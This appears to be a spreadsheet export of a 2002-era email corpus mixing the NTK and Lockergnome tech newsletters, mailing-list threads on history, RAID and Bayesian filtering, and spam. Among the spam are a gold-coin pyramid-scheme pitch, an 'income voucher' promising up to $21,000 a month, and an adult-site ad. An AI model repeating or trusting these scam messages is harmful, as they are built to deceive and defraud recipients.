          2002-08-24, Doolin, Co. Clare, Ireland, for a "small voluntary
          donation" per hiker) might just be the only walking holiday
          you ever persuade your company to pay for. Continuing the
          outdoor theme, somewhat shorter notice for this Sunday's
          GREATER LONDON LINUX USER GROUP BLETCHLEY PARK PICNIC (around
          12noon, Sun 2002-08-18, Bletchley, near Milton Keynes, UKP6
          admission fee). And for anyone who can't make the whole week
          in Ireland, there's some consolation in the form of LONDON
          PERLMONGERS PRESENT: DAMIEN CONWAY AT THE CONWAY HALL (6pm,
          Tue 2002-08-27 and Thu 2002-08-29, Conway Hall, London WC1R,
          free) - hopefully just the start of a similarly-named speaker/
          venue trend which will also see Larry Wall performing at the
          Great Wall Of China, and Eric Raymond at London's Raymond
          Revue Bar.
          http://www.lbw2002.draiocht.net/
          - sadly, less excuse for "pingtime for Hitler" gag this year
          http://list.ftech.net/pipermail/gllug/2002-August/025308.html
            - bring your "Cryptonomicon", please don't deface his Wiki
          http://london.pm.org/meetings/
               - last time: http://www.bluedust.com/projects/info7.asp
          http://www.gabba.net/pnp/lofi.asp
          - Plug'n'Play this Sun, feat. Casiotone &amp; Thorsten Sideboard
          http://www.ica.org.uk/index.cfm?articleid=7641
            - and Hacking @ ICA tonight, assuming you get this in time
                                 &gt;&gt; TRACKING &lt;&lt;
                sufficiently advanced technology : the gathering
          Dijkstra finally gone? Great. Now we can hang out with those
          sloppy little unrigorous languages he never let into the
          house. Right on cue: the latest dev version of GNU
          SMALLTALK, that dirty treat-me-like-an-object ducky. Version
          2.0b sprouts HTML-embedding and experimental MySQL support -
          implying you might actually be able to do something useful
          with it. Admittedly, "useful" has not been a word  much used
          in the Smalltalk community recently. Many of the current
          addicts seem to live entirely in the pleasuredomes of that
          Land of Infinite Fun, Alan Kay's Smalltalk sequel SQUEAK,
          the cross-platform UI-kablooie playground which, over time,
          been overloaded with more ill-fitting metaphors than this
          sentence. But even Squeak is showing signs of returning to
          planet Earth. Talk of cleaning up the object tree are rife;
          coders are working on XP-alike skins (instead of Squeak's
          peculiarly homely interface right now). There's even word of
          a SmallTalkish scripting language in the offing. And all
          those new MacOS X Objective C hackers are following the
          trail back to the NeXT's great ancestor, giving a timely
          boost to the tribe. Xerox Parc *will* return!
          http://freshmeat.net/releases/93723/
                                               - the smaller Smalltalk
          http://www.squeak.org/download/
                                                   - pretty colours
          http://lists.squeakfoundation.org/pipermail/squeak-dev/
                                            - where they're all hiding
          http://www.iam.unibe.ch/~ducasse/WebPages/FreeBooks.html
                                                - look! free ST books!
          http://www.pocketsmalltalk.com/
                                                - look! free Palm IDE!
                                 &gt;&gt; MEMEPOOL &lt;&lt;
                   ceci n'est pas une http://www.gagpipe.com/
          where's Wendy?: http://3gamerchicks.com/features/bobsex/ ...
          http://news.bbc.co.uk/1/hi/2188214.stm got a bargain from:
      http://www.salon.com/tech/feature/2002/08/03/deleteddomains/print.html
          - still, makes a change from press releases from BT OPENWORLD:
          http://news.bbc.co.uk/1/hi/technology/2181078.stm ... life
          imitates http://www.thebrainstrust.co.uk/article.15.1961.html
          (from last summer); in the meantime, we can look forward to:
          http://www.martian.fm/countdown_it.htm ... at last - Java
          PARADROID: http://www.javaonthebrain.com/java/noids/ ... so
          has "10,000 Statistically Grammar-Average Fake Band Names"
          been taken?: http://web.media.mit.edu/~bwhitman/10000.html ...
          UNWITTING DOUBLE-ENTENDRE CORNER - "Genetic Distribution of
          the Labial Flap": http://www.sil.org/silewp/2001/002/ vs a
          trained eye on "The lines, crevices, and folds of your fanny":
          http://www.jacquelinestallone.com/reportsDocs/rumpology.html ...
                                 &gt;&gt; GEEK MEDIA &lt;&lt;
                                   get out less
          TV&gt;&gt; the objection that "Elvis - was a hero to most, but he
          never meant shit to me" is addressed in ENTERTAINING ELVIS
          (1.35am, Fri, ITV), in which "The King" offers his views on
          our modern-day pop acts... the horror continues in the form of
          CANDYMAN II (1.10am, Fri, C4) and William Peter "The Exorcist"
          Blatty's psycho-nonsense THE NINTH CONFIGURATION (2.45am, Fri,
          C4)... and Jason "Seinfeld" Alexander plays one of a bunch of
          gay friends - not that there's anything wrong with that - in
          LOVE! VALOUR! COMPASSION! (12.40am, Fri, C5)... Jarvis Cocker
          *is* Rolf Harris, while "Allstars" impersonate the recently
          deceased "Steps" in CELEBRITY STARS IN THEIR EYES (8.30pm,
          Sat, ITV)... Sarah Michelle Gellar and Selma "Legally Blonde"
          Blair put the "les" back into "Les Liaisons Dangereuses" in
          their noted http://www.girlskissing.co.uk/video.htm classic
          CRUEL INTENTIONS (9.30pm, Sat, C4)... leading into a late-
          night character actor fest featuring Paul "Boogie Nights"
          Anderson's feature debut HARD EIGHT (12.35am, Sat, BBC2),
          David Mamet's Steve Martin con-game THE SPANISH PRISONER
          (1.20am, Sat, C4), and Oirish juvenile delinquent coming-of-
          ager THE BUTCHER BOY (12.55am, Sat, C5)... things get back to
          normal on Sunday with the incomprehensible remake of MISSION:
          IMPOSSIBLE (8.15pm, Sun, BBC1) - not to be confused with the
          simultaneously fruitless THE HUNT FOR THE ANTHRAX KILLER (9pm,
          Sun, BBC2)... Christina Ricci, Lisa Kudrow comedy THE OPPOSITE
          OF SEX (10pm, Sum, C4) has snappy script, no plot... and it's
          the final episode of the seemingly interminable 24 (10pm, Sun,
          BBC2): http://www.doyourecall.co.uk/ ... the - presumably
          rhetorically titled - DID BARRY GEORGE KILL JILL DANDO? (9pm,
          Mon, C4) and WHO KILLED SIMONE VALENTINE? (11.05pm, Mon, C4)
          are helpfully scheduled either either side of SIX FEET UNDER
          (10pm, Mon, C4)... Michael "David St Hubbins" McKean moves
          into management in sub-"Spinal Tap" hostage romp AIRHEADS
          (10.55pm, Mon, C5)... the consistently worrying TEENAGE KICKS
          (10pm, Tue, C4) looks at "Teenage Dwarfs" - next week:
          "Teenage Dirtbags"?... and http://www.diffusiononline.net/
          inspiration BARGAIN HUNT (8pm, Thu, BBC1) arrives on prime-
          time - frankly we still prefer his mix of "147 Lockdown"...
          FILM&gt;&gt; if they'd used the proper mathematical sigma symbol in
          the title, then the sequel could have been called "The
          Derivative Of Distress - With Respect To Terror" for largely
          humourless feelgood nuclear thriller THE SUM OF ALL FEARS
        ( http://www.screenit.com/movies/2002/the_sum_of_all_fears.html :
          We see [Bridget "Coyote Ugly" Moynahan] in bed, showing some
          cleavage; the camera briefly focuses on some cheerleaders'
          clothed butts during the Super Bowl)... oh and it's the full
          release this week for SPY KIDS 2: THE ISLAND OF LOST DREAMS
          ( http://www.capalert.com/capreports/spykids2.htm : telepathy;
          pelvic thrusts by a child; drinking with multiple drugging;
          "Let's kick their [posteriors]" - which is not included in the
          list of three/four letter word vocabulary but is impudent;
          toilet humor - smothering in a pile of dung with fecal matter
          in mouth)...
          CONFECTIONERY THEORY&gt;&gt; "Are you tracking breakfast cereal?"
          inquired a concerned LLOYD WOOD, after recently wandering into
          the "kiddy end" of the cereal aisle. "They've all gone CD-ROM
          on the front", he observed - causing him, for a moment to
          think he was looking at "some really bloated computer
          magazines". Of course we are, Lloyd, though we're not as
          easily swayed by gimmicks as you are, and thus can impartially
          report that NESTLE's Maryland-style COOKIE CRISP are the most
          biscuit-like breakfast ever, easily triumphing over KELLOGG's
          FROSTIES CHOCOLATE (too much chocolate, not enough "frosty"),
          COCO POPS CRUNCHERS (clump together in this humid weather) and
          even the Winnie The Pooh-themed DISNEY HUNNY B's - and if you
          mix them all together, the milk goes so chocolatey it'll turn
          your Pooh brown... elsewhere in dairy, MCDONALD'S continue a
          disappointing run of toppings for the MCFLURRY (99p) -
          Cadbury's Caramel is rubbish, and Jammie Dodgers not a patch
          on our second-favourite McFlurry of all time, the Strawberry
          Crunch: http://www.ntk.net/index.cgi?b=02001-08-10&amp;l=286#l .
          Reader ED AVIS complains that KFC don't tell you that their
          "M&amp;M" AVALANCHE (also 99p) does not feature real M&amp;Ms but
          "special miniaturised ones", which he describes as "frozen
          solid" and "might as well be small bits of gravel for all the
          chocolate flavour they impart". While, following last week's
          announcement of Ice T's Posse Pops, CRAIG LEFF thought we'd be
          reassured by the news that NBC are launching their own range
          of TV-themed Baskin-Robbins ice-creams, including a "Fear
          Factor" flavour designed to recreate the experience of eating
          "dirt and spiders": http://www.adage.com/news.cms?newsId=35520
          ... back with confectionery, LEON VERRALL remained unimpressed
          with STARBURST FRUITINESSE (from 49p, "tasted of plastic...
          [resembled] those 'food pills' they thought we'd all be eating
          by now"), DAVID BLANE grudgingly approved of the TWIX TRIPLE
          CHOC LIMITED EDITION ("Not bad, faintly evoking Penguins,
          which I never liked because of the thick chocolate"), and the
          whole point of that controversial "It's not for girls"
          campaign was revealed: to position NESTLE DOUBLE CREAM (40p)
          as a more female-friendly version of the YORKIE BAR. Other
          treats to look forward to in coming weeks: Cola-flavoured
          CADBURY-TREBOR REFRESHERS, chicken-wings-flavoured HULA HOOPS,
          bacon QUAVERS, the (presumably) non-crisp-like GOLDEN WONDER
          FRUIT WONDERS - or, indeed, any of this weird new American
          stuff: http://www.candyusa.org/Press/New/ace2002.shtml ,
          ranging from SCORNED WOMAN CHOCOLATE JALAPENO FUDGE to SOFT
          AND CHEWY STINKY FEET ("Mmm, these feet are *so* stinky")...
                                &gt;&gt; SMALL PRINT &lt;&lt;
        Need to Know is a useful and interesting UK digest of things that
          happened last week or might happen next week. You can read it
        on Friday afternoon or print it out then take it home if you have
      nothing better to do. It is compiled by NTK from stuff they get sent.
                        Registered at the Post Office as
          "yeah, thanks Edge, knew you had a worse picture somewhere"
                          (p014, Edge, September 2002)
                                  NEED TO KNOW
             THEY STOLE OUR REVOLUTION. NOW WE'RE STEALING IT BACK.
                          Archive - http://www.ntk.net/
               Unsubscribe? Mail ntknow-unsubscribe@lists.ntk.net
                 Subscribe? Mail ntknow-subscribe@lists.ntk.net
    NTK is supported by UNFORTU.NET, and by you: http://www.geekstyle.co.uk/
                           (K) 2001 Special Projects.
              Copying is fine, but include URL: http://www.ntk.net/
                     Tips, news and gossip to tips@spesh.com
              All communication is for publication, unless you beg.
               Press releases from naive PR people to pr@spesh.com
      Remember: Your work email may be monitored if sending sensitive material.
        Sending &gt;500KB attachments is forbidden by the Geneva Convention.
               Your country may be at risk if you fail to comply.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WHAT HAPPENED TO YOU??? -       982244611
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (jm@news4.inlink.com) on Tuesday, May 21, 2002 at 09:22:41
 ---------------------------------------------------------------------------
 : 
 www.THOMB.com is the only free site that is entirely made up of British babes. Over 10,000 fresh pictures of the UK's sexiest girls, more than any other site out there.
 No Credit Card.
 Only Free Galleries.
 25155843&amp;&amp;25155843-25155843
 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Man uses cell phone to take snap inside schoolgirl's skirt
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: William Knowles &lt;erehwon@c4i.org&gt;
 http://mdn.mainichi.co.jp/news/20021201p2a00m0fp001000c.html
 Mainichi Shimbun
 Dec. 1, 2002
 KASHIWA, Chiba -- A man has been arrested for using his camera-equipped
 mobile phone to take a photo of the inside of a schoolgirl's skirt
 as she rode an escalator here, police said.
 Toyokazu Hamano, 40, a company employee from Noda, Chiba Prefecture,
 was arrested for breaking a Chiba Prefectural Government law
 forbidding people from creating a public nuisance.
 Hamano admits to the allegations.
 Police said Hamano was riding behind the girl on an escalator at
 JR Kashiwa Station when he took out his mobile phone, held it
 underneath the girl's skirt and took a photo. The girl was alerted
 to his presence by the noise emitted by the phone camera's shutter.
 She turned around to catch Hamano with his hands between her legs.
</t>
  </si>
  <si>
    <t xml:space="preserve">The die offs in areas with better records parallel and support the
 claims that European diseases were devastating to all American
 hemisphere populations, and the reverse was never true.  Unlike, for
 example, India or Asia.
 There is a hot dispute about the original size of the indigenous
 population, but the evidence for a high density in the Mexican area is
 sound.  It was up here in the North or in the Amazon where I'm a little
 more suspicious of very high upward revisions.
 At least that was my take.
 I have never heard anyone seriously argue that European diseases were
 not a significant factor, or that there were not in fact a lot of Aztec
 people prior to Cortez.  Gee, I've never before heard someone argue
 unseriously about it either.
 Do you have a reference for a book or article which does so?
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Robert
 &gt; Harley
 &gt; Sent: Sunday, August 18, 2002 4:57 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Cc: rah@shipwright.com
 &gt; Subject: Re: Al'Qaeda's fantasy ideology: Policy Review no. 114
 &gt; 
 &gt; &gt;See Jared Diamond's excellent "Guns, Germs, and Steel" for the story.
 &gt; 
 &gt; Yeah, I know the party line.  The evidence for it is extremely meagre.
 &gt; New Worlders had two entire continents and tens of millions of people,
 &gt; which is a plenty big enough reservoir for infectious diseases to
 thrive
 &gt; in.  Their records show that they were plagued with them long before
 1492.
 &gt; 
 &gt; Take Ireland in the early 1800s.  Assume a population of circa 8
 &gt; million.  Take Ireland around 1900.  Assume a population not much
 &gt; above 3 million.  Ignore natural variations between mortality and
 &gt; natality.  Omit emigration.  Observe the Great Famine in the middle.
 &gt; Deduce that it killed 5 million (actually about 1).  Transpose to 16th
 &gt; century Mexico.  Grossly inflate estimates of pre-contact population,
 &gt; because nobody has a damn clue what it was anyway.  Underestimate
 &gt; later population levels.  Deduce that 10's of millions died.  Lather,
 &gt; rinse, repeat.
 &gt; 
 &gt; R
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">ok i read back, thats not a typo, you mean three thousand lovers.
 where do you get your data? It seems very unlikely, but if you have 
 supporting evidence i'd like to see it.
 Chris
 On Mon, 9 Sep 2002, Eugen Leitl wrote:
 &gt; On Sun, 8 Sep 2002, CDale wrote:
 &gt; 
 &gt; &gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gays
 &gt; 
 &gt; So how many of your hetero friends had &gt;3 k lovers?
 &gt; 
 &gt; &gt; are promiscuous, and so are hets, but I betcha gays are more
 &gt; &gt; AIDSphobic than hets, generally speaking....
 &gt; 
 &gt; The virus load issue is orthogonal to the fact. Bzzt. Switch on your
 &gt; brain, you both. I was mentioning that a subpopulation outside of the sex
 &gt; industry is/used to be extremely promiscuous, about two orders of
 &gt; magnitude higher than average.
 &gt; 
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Congratulations on Your 2 New Signups
</t>
  </si>
  <si>
    <t xml:space="preserve">Come claim your 2 free signups.  We will give
 you 2 free signups and then put 2 under both
 of them, so on and so forth!  We will in essence 
 build your downline for you!  See the write-up 
 in the USA Today on this program (Friday Edition)
 To sign up for free click the link below:
 mailto:trippleplay43@excite.com?subject=2_free_signups
 The national attention drawn to this program by
 the media will drive this program with incredible
 momentum! Don't wait, if you wait, you loose people. 
 This is building incredibly fast!  To claim your 2
 FREE signups and reserve your position, click here
 mailto:trippleplay43@excite.com?subject=2_free_signups
 This program is putting GOLD COINS into peoples
 hands in record speed, don't wait!
 All the best,
 Gold Coin Distribution
 1-800-242-0363, Mailbox 1993
 ______________________________________________________
 To be removed from our database, please click below:
 mailto:nogold4me666@excite.com?subject=remove  
</t>
  </si>
  <si>
    <t xml:space="preserve">I don't see why not John, but I'd sure backup my data first ;--)
 So I suppose you could setup half of the raid1, copy your partitions across,
 vi lilo to append the new device labels, /dev/md0 instead of /dev/hda...
 re-run lilo, then raidhotadd /dev/xxx /dev/md0 [or is that the other way
 around?]
 I have never tried this so this could be bollix, I have setup root-raid
 systems but during install time, I have had drive failures on my
 "production" systems at home and successfully re-built the raid many times.
 IMHO linux software raid is extremely good.
 When are we going to have a pint? 
 CW
 --------------------------
  I've a running system, and I want to set it up so that the disks are
 mirrored. I'll win a little more read speed, and a lot more reliability.
  However, the RAID_HOWTO just mentions RAID 1 and RAID 0 on a machine
 that's new. They don't mention anything about an existing setup. Is it
 possible to setup disk mirroring on a running box ?
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 26 Jul 2002, James Rogers wrote:
 --]grew up in as abject a poverty as you can find in the US and I remember
 --]quite well why the people that stayed poor were poor -- it certainly
 --]wasn't because of The Man.
 Same here. My folks were both born and raised in a blue color section of
 the Bronx. I was raised in the same Apt my dad was raised in...a tiny one
 bedroom place.
 Both my folks got educated and moved away from the lifestyle of "in da
 poor trenches 4 life"
 --]Unlike many others, I actually learned from the experience.
 Yep. I wached as my dad went for his GED then his Bachelors and so on. I
 watched as both he and my mom worked hard to get out of the place they
 were. Once thing it taught me, its tough work but if you havea goal then
 its worth it.
 --]Stephen Hawking) are quite happy merely being comfortable and devote
 --]their energy elsewhere than being "rich".  But I don't know too many
 --]really smart people that actually choose to live in poverty.
 Its that language thing again. Rich is a very vast word, its like Salt. If
 you put it on steak its going to taste differnt then if you season pasta
 with it.
 --]It sounds like you've bought into the absurd Hollywood depictions of
 --]what wealthy people are like.
 Us Vs THEM, its ages old and the power structures inately know that to
 keep things goign there way folks need, NEED..heck DEMAND the US vs THEM
 strugle. So its the Wealthy VS the Poor...the Smart Vs the Stupid...the
 With vs the Withouts....and all the while those shmucks who go underdog
 down trodden need only get out of the loop and play a differnt game.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] BANK ERROR IN YOUR FAVOR
</t>
  </si>
  <si>
    <t xml:space="preserve">SUBSTANTIAL MONTHLY INCOME MAKERS VOUCHER
 Income Transfer Systems/Distribution Center
 ************************************************************
 Pending Income Amount:  up to $21,000.00
 Action:http://www.hotresponders.com/cgi-bin/varpro/vartrack.cgi?t=wendy7172:1
 ************************************************************
 Good News!  You have made the Substancial Income Makers list.  This means you get the entire system and get the opportunity to make up to $21,000.00 a month.
 To receive this system, follow this link!  
        http://www.hotresponders.com/cgi-bin/varpro/vartrack.cgi?t=wendy7172:1
 Get ready, you will immediately receive all the information needed to make a substantial monthly income.
 What are you waiting for!!  http://www.hotresponders.com/cgi-bin/varpro/vartrack.cgi?t=wendy7172:1
 You are receiving this email due to having requested info on internet businesses.  If you are not longer looking for one, please click the remove link below. 
 Click on the link below to remove yourself
 http://www.hotresponders.com/cgi-bin/varpro/r.cgi?id=wendy7172&amp;a=ilug@linux.ie
 AOL Users
 &lt;a href="http://www.hotresponders.com/cgi-bin/varpro/r.cgi?id=wendy7172&amp;a=ilug@linux.ie"&gt; Remove Me&lt;/a&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Tech Specialist]  Frequent Format
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020716.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020716.html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&lt;/style&gt;&lt;title&gt;20020716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07.16.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;"A network administrators tool kit"&lt;/b&gt; 
 OpalisRobot automates a broad range of admin tasks 
 including system monitoring, corrective action and 
 job scheduling. It detects and corrects system errors 
 &amp;amp; automates jobs, enabling proactive management of 
 business-critical servers. 
 &lt;a href="http://www.opalis.com?source=locker07-16-02"&gt;Download &amp;amp; test-drive OpalisRobot today&lt;/a&gt;! 
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Being that I have a print subscription to PocketPC Magazine, 
 I haven't been by their website in quite some time, so when 
 Hal Goldstein informed me of a new electronic delivery 
 method that they've employed, I felt obligated to give it a 
 spin. You can check out the September 2002 Issue of the &lt;a 
 href="http://www.pocketpcmag.com/digital/default.asp"&gt;Digital 
 Edition&lt;/a&gt; and see if you like reading the mag in that 
 format better than the print variety. A Software and 
 Accessories Encyclopedia is also new to the site since my 
 last belated visit.
 &lt;p&gt;I've also been using my PocketPC quite a bit lately, but 
 not for data. It's found a more frequent home on my belt as 
 an MP3 player ever since Diana's dad gave us a bicycle. 
 Going out for a morning ride has been quite pleasurable, and 
 it's nice to bring along some tunes. I've tried both the 
 Compaq iPaq 3870 and HP Jornada 565, and have been more 
 pleased with the audio ability of the iPaq, due in part to 
 the sound utility Compaq provides to adjust treble and bass 
 levels. It's just a more full-sounding device, in my 
 opinion.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&lt;b&gt;LDAP Whodunit&lt;/b&gt;
 &lt;br&gt;Pondered by Warren Dugas
 &lt;p&gt;"Randy, a little question for you: Do you know what LDAP is and how important it is to the world of technology? I'm sure you do - but where did it come from? Hmm, let's put our thinking caps on and try to figure it out. Did Microsoft create it? Hmm - No, how about Novell? Nope. Well, who then?"
 &lt;p&gt;History of LDAP 
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/TechNet/prodtechnol/winntas/evaluate/featfunc/ldapcmr.asp"&gt;http://www.microsoft.com/TechNet/prodtechnol/winntas/evaluate/featfunc/ldapcmr.asp&lt;/a&gt;
 &lt;p&gt;X.500, the OSI directory standard, defines a 
 comprehensive Directory Service, including an information 
 model, namespace, functional model, and authentication 
 framework. X.500 also defines the Directory Access Protocol 
 (DAP) used by clients to access the directory. DAP is a full 
 OSI protocol that contains extensive functionality, much of 
 which is not used by most applications. 
 &lt;p&gt;DAP is significantly more complicated than the more 
 prevalent TCP/IP stack implementations and requires more 
 code and computing horsepower to run. The size and 
 complexity of DAP makes it difficult to run on thin clients, 
 such as the PC and Macintosh where TCP/IP functionality 
 often comes with the machine. DAP stack implementations are 
 cumbersome to administer, thus limiting the acceptance of 
 X.500. Hence in 1993, the folks at University of Michigan, 
 with help from the ISODE Consortium, designed and developed 
 a protocol that would work over TCP/IP and was small enough 
 when implemented to run on a thin client like PC's running 
 the Windows operating system or the Macintosh. 
 &lt;p&gt;The LDAP version 1 Specification was published in March 
 of 1994. The LDAP version 2 Specification was published as 
 rfc 1777 by the Access Searching and Indexing of Directories 
 (ASID) working group in the IETF in March of 1995. In April 
 of 1996, 40 companies including Microsoft, Netscape, and 
 Novell separately announced support for LDAP protocol in 
 their Directory Services products in order that they may in 
 turn operate with each other and integrate with the 
 Internet. LDAP version 3.0 has gone through several drafts 
 but at this time is not finished. 
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Looking for Sound&lt;/b&gt;
 &lt;br&gt;Suggested by Corey Hollett
 &lt;p&gt;&lt;a class="url" href="http://www.turtlebeach.com/site/products/santacruz/whatdoineed.asp"&gt;http://www.turtlebeach.com/site/products/santacruz/whatdoineed.asp&lt;/a&gt;
 &lt;br&gt;&lt;a class="url" href="http://www.3dsoundsurge.com/reviews/earlyimpressions/ProMedia51.html"&gt;http://www.3dsoundsurge.com/reviews/earlyimpressions/ProMedia51.html&lt;/a&gt;
 &lt;p&gt;&lt;i&gt;"I've just gone on an extensive hunt for the best 
 sound card and speaker set combination for 5.1 sound. My 
 criteria were that it be excellent for games, music, and dvd 
 playback. A price under $500.00 was also a strong 
 point."&lt;/i&gt;
 &lt;p&gt;Corey came to the same conclusion that others have in two 
 respects. Creative has long maintained a healthy share of 
 the sound card market with a solid name and decent products. 
 Audiophiles know of other brands as well, such as Turtle 
 Beach and Philips, which also produce quality sound cards 
 and at attractive price points. Corey decided on the Turtle 
 Beach Santa Cruz card, a great choice. 
 &lt;p&gt;His choice of speaker systems reinforced my own feelings 
 on the subject. I own two Klipsch speaker sets, the ProMedia 
 2.400 and most recently the ProMedia 5.1. The 2.400 system 
 was the subject of many positive reviews, and believe me 
 when I say that the ProMedia 5.1 leaves the 2.400 in the 
 dust. The above review that Corey pointed out hits the high 
 points, and is actually quite in-depth for an "initial" 
 review. I'm itching to see if they eventually do write up a 
 more complete version, as mentioned in the article. 
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q269272"&gt;Q269272 - Mail Client Address List Truncated Using "Mailto:" Link If Tag Exceeds 260 Characters (Q269272)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q313043"&gt;Q313043 - FIX: Creation of Local Cube Fails (Q313043)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q320273"&gt;Q320273 - Subfolders of a Web Folder Are Not Enumerated in the Folders Pane in Windows XP (Q320273)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q241210"&gt;Q241210 - Drive List Shows Only Program Drive in 16-Bit and 32-Bit Programs (Q241210)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q241189"&gt;Q241189 - SNMP Memory Leak in Windows NT4.0 Peer-to-Peer Network (Q241189)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET HIGH-SPEED ACCESS:&lt;/b&gt; Verizon Online DSL is an affordable, 
 high-speed Internet connection.  
 &lt;a href="http://www.qksrv.net/click-471546-2202776"&gt;Click here&lt;/a&gt; 
 to see if Verizon Online DSL is available in your area.
 &lt;img src="http://www.qksrv.net/image-471546-2202776" width="1" height="1" border="0"&gt;    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;QuickTime 6 Released&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.apple.com/quicktime/download/"&gt;http://www.apple.com/quicktime/download/&lt;/a&gt;
 &lt;p&gt;With the debut of QuickTime 6, we can assume that the 
 licensing haggles over MPEG-4 have been resolved, making way 
 for the long-awaited release. MPEG-4 isn't the only 
 addition, joining a new AAC audio codec that is a favorite 
 among professionals. Streaming media skip protection, Flash 
 5 support and better AppleScript functionality also tag 
 along. As always, there is a standard free version available 
 for download, but the Pro edition adds additional features, 
 such as full screen video playback, the ability to create 
 MPEG-4 content and editing features not present in the free 
 player.
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Microtel &amp; WalMart Love Linux&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.theregister.co.uk/content/4/26192.html"&gt;http://www.theregister.co.uk/content/4/26192.html&lt;/a&gt;
 &lt;p&gt;WalMart is selling Microtel PCs, but with a slight twist. 
 They were one of the first manufacturers to preinstall 
 LindowsOS and offer systems to the retail market through 
 WalMart.com, and now Mandrake is being offered as a pre-
 installed choice in operating systems. These options give 
 potential Linux users an easier way to get started without 
 having to build their own system from scratch or deal with 
 driver issues, while still maintaining a low overall cost. A 
 Pentium 4 2GHz system with a CD-RW drive goes for as little 
 as $648 with Mandrake Linux, so not too shabby at all.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href="http://www.lockergnome.com/issues/techspecialist/20020716.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020716.html&lt;/a&gt;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</si>
  <si>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[Spambayes] Re: New Application of SpamBayesian tech?
</t>
  </si>
  <si>
    <t xml:space="preserve">Neale Pickett &lt;neale@woozle.org&gt; writes:
 &gt; Skip Montanaro &lt;skip@pobox.com&gt; writes:
 &gt; 
 &gt; &gt; Yes.  It also seems to me that web page content filtering proxies (you
 &gt; &gt; know, keeping your kids or employees from visiting XXX websites) would
 &gt; &gt; be another good application of the technology.
 &gt; 
 &gt; Not to mention IDS (Intrusion Detection Systems).
 &gt; 
 &gt; IANAS but I have a friend who is, and he's suggested to me a few times
 &gt; that it would be very interesting and possibly fruitful to apply
 &gt; Bayesian analysis to network security.  But I think I'm going to have to
 &gt; pull out the probab/stats book from college before I embark on such a
 &gt; thing :)
 I have half a mind to see how it works as a replacement for gnus'
 adaptive scoring.  A harder problem than spam filtering, I guess, but
 it might be interesting.
 Cheers,
 M.
